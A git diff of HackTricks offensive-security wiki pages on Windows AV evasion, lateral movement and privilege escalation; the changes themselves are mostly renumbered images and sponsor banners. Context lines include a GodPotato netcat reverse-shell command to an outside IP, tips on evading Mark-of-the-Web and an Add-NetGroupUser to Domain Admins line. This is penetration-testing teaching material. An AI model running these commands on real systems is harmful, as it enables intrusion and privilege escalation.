 **MoTW** (Mark of The Web) is an [NTFS Alternate Data Stream](https://en.wikipedia.org/wiki/NTFS#Alternate\_data\_stream\_\(ADS\)) with the name of Zone.Identifier which is automatically created upon download files from the internet, along with the URL it was downloaded from.
 
-<figure><img src="../.gitbook/assets/image (234).png" alt=""><figcaption><p>Checking the Zone.Identifier ADS for a file downloaded from the internet.</p></figcaption></figure>
+<figure><img src="../.gitbook/assets/image (237).png" alt=""><figcaption><p>Checking the Zone.Identifier ADS for a file downloaded from the internet.</p></figcaption></figure>
 
 {% hint style="info" %}
 It's important to note that executables signed with a **trusted** signing certificate **won't trigger SmartScreen**.
@@ -265,7 +265,7 @@ It's important to note that executables signed with a **trusted** signing certif
 
 A very effective way to prevent your payloads from getting the Mark of The Web is by packaging them inside some sort of container like an ISO. This happens because Mark-of-the-Web (MOTW) **cannot** be applied to **non NTFS** volumes.
 
-<figure><img src="../.gitbook/assets/image (636).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../.gitbook/assets/image (640).png" alt=""><figcaption></figcaption></figure>
 
 [**PackMyPayload**](https://github.com/mgeeky/PackMyPayload/) is a tool that packages payloads into output containers to evade Mark-of-the-Web.
 
@@ -309,13 +309,13 @@ Most C2 frameworks (sliver, Covenant, metasploit, CobaltStrike, Havoc, etc.) alr
 
 It involves **spawning a new sacrificial process**, inject your post-exploitation malicious code into that new process, execute your malicious code and when finished, kill the new process. This has both its benefits and its drawbacks. The benefit to the fork and run method is that execution occurs **outside** our Beacon implant process. This means that if something in our post-exploitation action goes wrong or gets caught, there is a **much greater chance** of our **implant surviving.** The drawback is that you have a **greater chance** of getting caught by **Behavioural Detections**.
 
-<figure><img src="../.gitbook/assets/image (212).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../.gitbook/assets/image (215).png" alt=""><figcaption></figcaption></figure>
 
 * **Inline**
 
 It's about injecting the post-exploitation malicious code **into its own process**. This way, you can avoid having to create a new process and getting it scanned by AV, but the drawback is that if something goes wrong with the execution of your payload, there's a **much greater chance** of **losing your beacon** as it could crash.
 
-<figure><img src="../.gitbook/assets/image (1133).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../.gitbook/assets/image (1136).png" alt=""><figcaption></figcaption></figure>
 
 {% hint style="info" %}
 If you want to read more about C# Assembly loading, please check out this article [https://securityintelligence.com/posts/net-execution-inlineexecute-assembly/](https://securityintelligence.com/posts/net-execution-inlineexecute-assembly/) and their InlineExecute-Assembly BOF ([https://github.com/xforcered/InlineExecute-Assembly](https://github.com/xforcered/InlineExecute-Assembly))
diff --git a/windows-hardening/basic-powershell-for-pentesters/powerview.md b/windows-hardening/basic-powershell-for-pentesters/powerview.md
index 9d3304f0d..3e658545a 100644
--- a/windows-hardening/basic-powershell-for-pentesters/powerview.md
+++ b/windows-hardening/basic-powershell-for-pentesters/powerview.md
@@ -12,7 +12,7 @@
 
 </details>
 
-<figure><img src="/.gitbook/assets/WebSec_1500x400_10fps_21sn_lightoptimized_v2.gif" alt=""><figcaption></figcaption></figure>
+<figure><img src="https://pentest.eu/RENDER_WebSec_10fps_21sec_9MB_29042024.gif" alt=""><figcaption></figcaption></figure>
 
 {% embed url="https://websec.nl/" %}
 
@@ -348,7 +348,7 @@ Add-NetGroupUser -Username username -GroupName 'Domain Admins' -Domain my.domain
 ```
 
 
-<figure><img src="/.gitbook/assets/WebSec_1500x400_10fps_21sn_lightoptimized_v2.gif" alt=""><figcaption></figcaption></figure>
+<figure><img src="https://pentest.eu/RENDER_WebSec_10fps_21sec_9MB_29042024.gif" alt=""><figcaption></figcaption></figure>
 
 {% embed url="https://websec.nl/" %}
 
diff --git a/windows-hardening/lateral-movement/psexec-and-winexec.md b/windows-hardening/lateral-movement/psexec-and-winexec.md
index 4acfa0d1d..53e6bafbb 100644
--- a/windows-hardening/lateral-movement/psexec-and-winexec.md
+++ b/windows-hardening/lateral-movement/psexec-and-winexec.md
@@ -39,7 +39,7 @@ Find moe detailed steps in: [https://blog.ropnop.com/using-credentials-to-own-wi
 
 **You could also use the Windows Sysinternals binary PsExec.exe:**
 
-![](<../../.gitbook/assets/image (925).png>)
+![](<../../.gitbook/assets/image (928).png>)
 
 You could also use [**SharpLateral**](https://github.com/mertdas/SharpLateral):
 
diff --git a/windows-hardening/ntlm/README.md b/windows-hardening/ntlm/README.md
index 1f34b8b7a..bcd646980 100644
--- a/windows-hardening/ntlm/README.md
+++ b/windows-hardening/ntlm/README.md
@@ -37,7 +37,7 @@ You can check and configure which protocol will be used:
 
 Execute _secpol.msc_ -> Local policies -> Security Options -> Network Security: LAN Manager authentication level. There are 6 levels (from 0 to 5).
 
-![](<../../.gitbook/assets/image (916).png>)
+![](<../../.gitbook/assets/image (919).png>)
 
 ### Registry
 
diff --git a/windows-hardening/windows-local-privilege-escalation/README.md b/windows-hardening/windows-local-privilege-escalation/README.md
index 99356af4b..491f70248 100644
--- a/windows-hardening/windows-local-privilege-escalation/README.md
+++ b/windows-hardening/windows-local-privilege-escalation/README.md
@@ -1357,7 +1357,7 @@ COM classes and interfaces are defined in the registry under **HKEY\_**_**CLASSE
 
 Inside the CLSIDs of this registry you can find the child registry **InProcServer32** which contains a **default value** pointing to a **DLL** and a value called **ThreadingModel** that can be **Apartment** (Single-Threaded), **Free** (Multi-Threaded), **Both** (Single or Multi) or **Neutral** (Thread Neutral).
 
-![](<../../.gitbook/assets/image (726).png>)
+![](<../../.gitbook/assets/image (729).png>)
 
 Basically, if you can **overwrite any of the DLLs** that are going to be executed, you could **escalate privileges** if that DLL is going to be executed by a different user.
 
diff --git a/windows-hardening/windows-local-privilege-escalation/access-tokens.md b/windows-hardening/windows-local-privilege-escalation/access-tokens.md
index ac7f98903..eeda2852e 100644
--- a/windows-hardening/windows-local-privilege-escalation/access-tokens.md
+++ b/windows-hardening/windows-local-privilege-escalation/access-tokens.md
@@ -14,7 +14,7 @@
 
 ### [WhiteIntel](https://whiteintel.io)
 
-<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../../.gitbook/assets/image (1227).png" alt=""><figcaption></figcaption></figure>
 
 [**WhiteIntel**](https://whiteintel.io) is a **dark-web** fueled search engine that offers **free** functionalities to check if a company or its customers have been **compromised** by **stealer malwares**.
 
@@ -24,7 +24,7 @@ You can check their website and try their engine for **free** at:
 
 {% embed url="https://whiteintel.io" %}
 
----
+***
 
 ## Access Tokens
 
@@ -78,7 +78,7 @@ SeTimeZonePrivilege           Change the time zone                 Disabled
 
 or using _Process Explorer_ from Sysinternals (select process and access"Security" tab):
 
-![](<../../.gitbook/assets/image (769).png>)
+![](<../../.gitbook/assets/image (772).png>)
 
 ### Local administrator
 
@@ -131,10 +131,9 @@ Take a look to [**all the possible token privileges and some definitions on this
 
 Learn more about tokens in this tutorials: [https://medium.com/@seemant.bisht24/understanding-and-abusing-process-tokens-part-i-ee51671f2cfa](https://medium.com/@seemant.bisht24/understanding-and-abusing-process-tokens-part-i-ee51671f2cfa) and [https://medium.com/@seemant.bisht24/understanding-and-abusing-access-tokens-part-ii-b9069f432962](https://medium.com/@seemant.bisht24/understanding-and-abusing-access-tokens-part-ii-b9069f432962)
 
-
 ### [WhiteIntel](https://whiteintel.io)
 
-<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../../.gitbook/assets/image (1227).png" alt=""><figcaption></figcaption></figure>
 
 [**WhiteIntel**](https://whiteintel.io) is a **dark-web** fueled search engine that offers **free** functionalities to check if a company or its customers have been **compromised** by **stealer malwares**.
 
diff --git a/windows-hardening/windows-local-privilege-escalation/acls-dacls-sacls-aces.md b/windows-hardening/windows-local-privilege-escalation/acls-dacls-sacls-aces.md
index 5a30c6e0a..8f65a7518 100644
--- a/windows-hardening/windows-local-privilege-escalation/acls-dacls-sacls-aces.md
+++ b/windows-hardening/windows-local-privilege-escalation/acls-dacls-sacls-aces.md
@@ -1,12 +1,12 @@
 # ACLs - DACLs/SACLs/ACEs
 
-<figure><img src="../../.gitbook/assets/image (45).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../../.gitbook/assets/image (48).png" alt=""><figcaption></figcaption></figure>
 
 \
-Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
+Use [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_content=acls-dacls-sacls-aces) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
 Get Access Today:
 
-{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
+{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=acls-dacls-sacls-aces" %}
 
 <details>
 
@@ -92,7 +92,7 @@ By doing things this way, the owner of a file or folder can be very precise abou
 
 So, this **"canonical order"** is all about making sure the access rules are clear and work well, putting specific rules first and organizing everything in a smart way.
 
-<figure><img src="../../.gitbook/assets/image (45).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../../.gitbook/assets/image (48).png" alt=""><figcaption></figcaption></figure>
 
 \
 Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
@@ -191,10 +191,10 @@ Other ways to support HackTricks:
 
 </details>
 
-<figure><img src="../../.gitbook/assets/image (45).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../../.gitbook/assets/image (48).png" alt=""><figcaption></figcaption></figure>
 
 \
-Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
+Use [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_content=acls-dacls-sacls-aces) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
 Get Access Today:
 
-{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
+{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=acls-dacls-sacls-aces" %}
diff --git a/windows-hardening/windows-local-privilege-escalation/dll-hijacking/README.md b/windows-hardening/windows-local-privilege-escalation/dll-hijacking/README.md
index 722235ba1..d4879c7fb 100644
--- a/windows-hardening/windows-local-privilege-escalation/dll-hijacking/README.md
+++ b/windows-hardening/windows-local-privilege-escalation/dll-hijacking/README.md
@@ -39,13 +39,13 @@ Several methods are employed for DLL hijacking, each with its effectiveness depe
 
 The most common way to find missing Dlls inside a system is running [procmon](https://docs.microsoft.com/en-us/sysinternals/downloads/procmon) from sysinternals, **setting** the **following 2 filters**:
 
-![](<../../../.gitbook/assets/image (958).png>)
+![](<../../../.gitbook/assets/image (961).png>)
 
-![](<../../../.gitbook/assets/image (227).png>)
+![](<../../../.gitbook/assets/image (230).png>)
 
 and just show the **File System Activity**:
 
-![](<../../../.gitbook/assets/image (150).png>)
+![](<../../../.gitbook/assets/image (153).png>)
 
 If you are looking for **missing dlls in general** you **leave** this running for some **seconds**.\
 If you are looking for a **missing dll inside an specific executable** you should set **another filter like "Process Name" "contains" "\<exec name>", execute it, and stop capturing events**.
diff --git a/windows-hardening/windows-local-privilege-escalation/dll-hijacking/writable-sys-path-+dll-hijacking-privesc.md b/windows-hardening/windows-local-privilege-escalation/dll-hijacking/writable-sys-path-+dll-hijacking-privesc.md
index 25f47c4bf..1f9ece223 100644
--- a/windows-hardening/windows-local-privilege-escalation/dll-hijacking/writable-sys-path-+dll-hijacking-privesc.md
+++ b/windows-hardening/windows-local-privilege-escalation/dll-hijacking/writable-sys-path-+dll-hijacking-privesc.md
@@ -59,13 +59,13 @@ if ($envPath -notlike "*$folderPath*") {
 * **After** the **file** is **generated**, **close** the opened **`procmon`** window and **open the events file**.
 * Add these **filters** and you will find all the Dlls that some **proccess tried to load** from the writable System Path folder:
 
-<figure><img src="../../../.gitbook/assets/image (942).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../../../.gitbook/assets/image (945).png" alt=""><figcaption></figcaption></figure>
 
 ### Missed Dlls
 
 Running this in a free **virtual (vmware) Windows 11 machine** I got these results:
 
-<figure><img src="../../../.gitbook/assets/image (604).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../../../.gitbook/assets/image (607).png" alt=""><figcaption></figcaption></figure>
 
 In this case the .exe are useless so ignore them, the missed DLLs where from:
 
diff --git a/windows-hardening/windows-local-privilege-escalation/dpapi-extracting-passwords.md b/windows-hardening/windows-local-privilege-escalation/dpapi-extracting-passwords.md
index 4b4e5b616..1ee2e527f 100644
--- a/windows-hardening/windows-local-privilege-escalation/dpapi-extracting-passwords.md
+++ b/windows-hardening/windows-local-privilege-escalation/dpapi-extracting-passwords.md
@@ -86,7 +86,7 @@ Get-ChildItem -Hidden C:\Users\USER\AppData\Local\Microsoft\Protect\{SID}
 
 This is what a bunch of Master Keys of a user will looks like:
 
-![](<../../.gitbook/assets/image (1118).png>)
+![](<../../.gitbook/assets/image (1121).png>)
 
 Usually **each master keys is an encrypted symmetric key that can decrypt other content**. Therefore, **extracting** the **encrypted Master Key** is interesting in order to **decrypt** later that **other content** encrypted with it.
 
diff --git a/windows-hardening/windows-local-privilege-escalation/integrity-levels.md b/windows-hardening/windows-local-privilege-escalation/integrity-levels.md
index 386e26bf9..f7e7fc8cd 100644
--- a/windows-hardening/windows-local-privilege-escalation/integrity-levels.md
+++ b/windows-hardening/windows-local-privilege-escalation/integrity-levels.md
@@ -16,7 +16,7 @@ Other ways to support HackTricks:
 
 ### [WhiteIntel](https://whiteintel.io)
 
-<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../../.gitbook/assets/image (1227).png" alt=""><figcaption></figcaption></figure>
 
 [**WhiteIntel**](https://whiteintel.io) is a **dark-web** fueled search engine that offers **free** functionalities to check if a company or its customers have been **compromised** by **stealer malwares**.
 
@@ -26,7 +26,7 @@ You can check their website and try their engine for **free** at:
 
 {% embed url="https://whiteintel.io" %}
 
----
+***
 
 ## Integrity Levels
 
@@ -43,11 +43,11 @@ A key rule is that objects can't be modified by processes with a lower integrity
 
 You can get the integrity level of a process using **Process Explorer** from **Sysinternals**, accessing the **properties** of the process and viewing the "**Security**" tab:
 
-![](<../../.gitbook/assets/image (821).png>)
+![](<../../.gitbook/assets/image (824).png>)
 
 You can also get your **current integrity level** using `whoami /groups`
 
-![](<../../.gitbook/assets/image (322).png>)
+![](<../../.gitbook/assets/image (325).png>)
 
 ### Integrity Levels in File-system
 
@@ -113,7 +113,7 @@ C:\Windows\System32\cmd-low.exe NT AUTHORITY\SYSTEM:(I)(F)
 
 Now, when I run `cmd-low.exe` it will **run under a low-integrity level** instead of a medium one:
 
-![](<../../.gitbook/assets/image (310).png>)
+![](<../../.gitbook/assets/image (313).png>)
 
 For curious people, if you assign high integrity level to a binary (`icacls C:\Windows\System32\cmd-high.exe /setintegritylevel high`) it won't run with high integrity level automatically (if you invoke it from a medium integrity level --by default-- it will run under a medium integrity level).
 
@@ -123,10 +123,9 @@ Not all files and folders have a minimum integrity level, **but all processes ar
 
 Due to the restrictions commented in this and the previous section, from a security point of view, it's always **recommended to run a process in the lower level of integrity possible**.
 
-
 ### [WhiteIntel](https://whiteintel.io)
 
-<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../../.gitbook/assets/image (1227).png" alt=""><figcaption></figcaption></figure>
 
 [**WhiteIntel**](https://whiteintel.io) is a **dark-web** fueled search engine that offers **free** functionalities to check if a company or its customers have been **compromised** by **stealer malwares**.
 
@@ -136,7 +135,6 @@ You can check their website and try their engine for **free** at:
 
 {% embed url="https://whiteintel.io" %}
 
-
 <details>
 
 <summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
diff --git a/windows-hardening/windows-local-privilege-escalation/juicypotato.md b/windows-hardening/windows-local-privilege-escalation/juicypotato.md
index 59cec20d5..9692effa2 100644
--- a/windows-hardening/windows-local-privilege-escalation/juicypotato.md
+++ b/windows-hardening/windows-local-privilege-escalation/juicypotato.md
@@ -14,7 +14,7 @@
 
 ### [WhiteIntel](https://whiteintel.io)
 
-<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../../.gitbook/assets/image (1227).png" alt=""><figcaption></figcaption></figure>
 
 [**WhiteIntel**](https://whiteintel.io) is a **dark-web** fueled search engine that offers **free** functionalities to check if a company or its customers have been **compromised** by **stealer malwares**.
 
@@ -24,7 +24,7 @@ You can check their website and try their engine for **free** at:
 
 {% embed url="https://whiteintel.io" %}
 
----
+***
 
 {% hint style="warning" %}
 **JuicyPotato doesn't work** on Windows Server 2019 and Windows 10 build 1809 onwards. However, [**PrintSpoofer**](https://github.com/itm4n/PrintSpoofer)**,** [**RoguePotato**](https://github.com/antonioCoco/RoguePotato)**,** [**SharpEfsPotato**](https://github.com/bugch3ck/SharpEfsPotato) can be used to **leverage the same privileges and gain `NT AUTHORITY\SYSTEM`** level access. _**Check:**_
@@ -133,7 +133,7 @@ c:\Users\Public>
 
 ### Launch a new CMD (if you have RDP access)
 
-![](<../../.gitbook/assets/image (297).png>)
+![](<../../.gitbook/assets/image (300).png>)
 
 ## CLSID Problems
 
@@ -157,7 +157,7 @@ Then download [test\_clsid.bat ](https://github.com/ohpe/juicy-potato/blob/maste
 
 ### [WhiteIntel](https://whiteintel.io)
 
-<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../../.gitbook/assets/image (1227).png" alt=""><figcaption></figcaption></figure>
 
 [**WhiteIntel**](https://whiteintel.io) is a **dark-web** fueled search engine that offers **free** functionalities to check if a company or its customers have been **compromised** by **stealer malwares**.
 
diff --git a/windows-hardening/windows-local-privilege-escalation/leaked-handle-exploitation.md b/windows-hardening/windows-local-privilege-escalation/leaked-handle-exploitation.md
index 6c1bf2c30..d8180b055 100644
--- a/windows-hardening/windows-local-privilege-escalation/leaked-handle-exploitation.md
+++ b/windows-hardening/windows-local-privilege-escalation/leaked-handle-exploitation.md
@@ -18,7 +18,7 @@ Other ways to support HackTricks:
 
 Handles in a process allow to **access** different **Windows resources**:
 
-![RootedCON2022 - Exploiting Leaked Handles for LPE](<../../.gitbook/assets/image (243).png>)
+![RootedCON2022 - Exploiting Leaked Handles for LPE](<../../.gitbook/assets/image (246).png>)
 
 There have been already several **privilege escalation** cases where a **privileged process** with **open and inheritable handles** have **run** an **unprivileged process** giving it **access to all those handles**.
 
@@ -65,17 +65,17 @@ Note that in order to **see all the handles of all the processes, the SeDebugPri
 
 To see the handles of a process, right click in the process and select Handles:
 
-![](<../../.gitbook/assets/image (613).png>)
+![](<../../.gitbook/assets/image (616).png>)
 
 You can then right click on the handle and **check the permissions**:
 
-![](<../../.gitbook/assets/image (943).png>)
+![](<../../.gitbook/assets/image (946).png>)
 
 ### Sysinternals Handles
 
 The [**Handles** ](https://docs.microsoft.com/en-us/sysinternals/downloads/handle)binary from Sysinternals will also list the handles per process in the console:
 
-![](<../../.gitbook/assets/image (717).png>)
+![](<../../.gitbook/assets/image (720).png>)
 
 ### LeakedHandlesFinder
 
diff --git a/windows-hardening/windows-local-privilege-escalation/msi-wrapper.md b/windows-hardening/windows-local-privilege-escalation/msi-wrapper.md
index 23165f1d7..c565eb5a8 100644
--- a/windows-hardening/windows-local-privilege-escalation/msi-wrapper.md
+++ b/windows-hardening/windows-local-privilege-escalation/msi-wrapper.md
@@ -15,15 +15,15 @@
 Download the free version app from [https://www.exemsi.com/documentation/getting-started/](https://www.exemsi.com/download/), execute it and wrap the "malicious" binary on it.\
 Note that you can wrap a "**.bat**" if you **just** want to **execute** **command lines (instead of cmd.exe select the .bat file)**
 
-![](<../../.gitbook/assets/image (414).png>)
+![](<../../.gitbook/assets/image (417).png>)
 
 And this is the most important part of the configuration:
 
-![](<../../.gitbook/assets/image (308).png>)
+![](<../../.gitbook/assets/image (312).png>)
 
-![](<../../.gitbook/assets/image (343).png>)
+![](<../../.gitbook/assets/image (346).png>)
 
-![](<../../.gitbook/assets/image (1069).png>)
+![](<../../.gitbook/assets/image (1072).png>)
 
 (Please, note that if you try to pack your own binary you will be able to modify these values)
 
diff --git a/windows-hardening/windows-local-privilege-escalation/roguepotato-and-printspoofer.md b/windows-hardening/windows-local-privilege-escalation/roguepotato-and-printspoofer.md
index 59e0fdc65..4f87e88b0 100644
--- a/windows-hardening/windows-local-privilege-escalation/roguepotato-and-printspoofer.md
+++ b/windows-hardening/windows-local-privilege-escalation/roguepotato-and-printspoofer.md
@@ -9,14 +9,14 @@ Other ways to support HackTricks:
 * If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
 * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
 * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
 * **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
 
 </details>
 
 ### [WhiteIntel](https://whiteintel.io)
 
-<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../../.gitbook/assets/image (1227).png" alt=""><figcaption></figcaption></figure>
 
 [**WhiteIntel**](https://whiteintel.io) is a **dark-web** fueled search engine that offers **free** functionalities to check if a company or its customers have been **compromised** by **stealer malwares**.
 
@@ -26,7 +26,7 @@ You can check their website and try their engine for **free** at:
 
 {% embed url="https://whiteintel.io" %}
 
----
+***
 
 {% hint style="warning" %}
 **JuicyPotato doesn't work** on Windows Server 2019 and Windows 10 build 1809 onwards. However, [**PrintSpoofer**](https://github.com/itm4n/PrintSpoofer)**,** [**RoguePotato**](https://github.com/antonioCoco/RoguePotato)**,** [**SharpEfsPotato**](https://github.com/bugch3ck/SharpEfsPotato)**,** [**GodPotato**](https://github.com/BeichenDream/GodPotato) can be used to **leverage the same privileges and gain `NT AUTHORITY\SYSTEM`** level access. This [blog post](https://itm4n.github.io/printspoofer-abusing-impersonate-privileges/) goes in-depth on the `PrintSpoofer` tool, which can be used to abuse impersonation privileges on Windows 10 and Server 2019 hosts where JuicyPotato no longer works.
@@ -90,6 +90,7 @@ GodPotato -cmd "nc -t -e C:\Windows\System32\cmd.exe 192.168.1.102 2012"
 ```
 
 ## References
+
 * [https://itm4n.github.io/printspoofer-abusing-impersonate-privileges/](https://itm4n.github.io/printspoofer-abusing-impersonate-privileges/)
 * [https://github.com/itm4n/PrintSpoofer](https://github.com/itm4n/PrintSpoofer)
 * [https://github.com/antonioCoco/RoguePotato](https://github.com/antonioCoco/RoguePotato)
@@ -98,7 +99,7 @@ GodPotato -cmd "nc -t -e C:\Windows\System32\cmd.exe 192.168.1.102 2012"
 
 ### [WhiteIntel](https://whiteintel.io)
 
-<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../../.gitbook/assets/image (1227).png" alt=""><figcaption></figcaption></figure>
 
 [**WhiteIntel**](https://whiteintel.io) is a **dark-web** fueled search engine that offers **free** functionalities to check if a company or its customers have been **compromised** by **stealer malwares**.
 
@@ -117,7 +118,7 @@ Other ways to support HackTricks:
 * If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
 * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
 * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
 * **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
 
 </details>
diff --git a/windows-hardening/windows-local-privilege-escalation/seimpersonate-from-high-to-system.md b/windows-hardening/windows-local-privilege-escalation/seimpersonate-from-high-to-system.md
index 8c2d99274..62c04284c 100644
--- a/windows-hardening/windows-local-privilege-escalation/seimpersonate-from-high-to-system.md
+++ b/windows-hardening/windows-local-privilege-escalation/seimpersonate-from-high-to-system.md
@@ -181,13 +181,13 @@ Let's check current Administrator permissions over `svchost.exe` processes with
 5. Select "Administrators" and click on "Edit"
 6. Click on "Show advanced permissions"
 
-![](<../../.gitbook/assets/image (434).png>)
+![](<../../.gitbook/assets/image (437).png>)
 
 The previous image contains all the privileges that "Administrators" have over the selected process (as you can see in case of `svchost.exe` they only have "Query" privileges)
 
 See the privileges "Administrators" have over `winlogon.exe`:
 
-![](<../../.gitbook/assets/image (1099).png>)
+![](<../../.gitbook/assets/image (1102).png>)
 
 Inside that process "Administrators" can "Read Memory" and "Read Permissions" which probably allows Administrators to impersonate the token used by this process.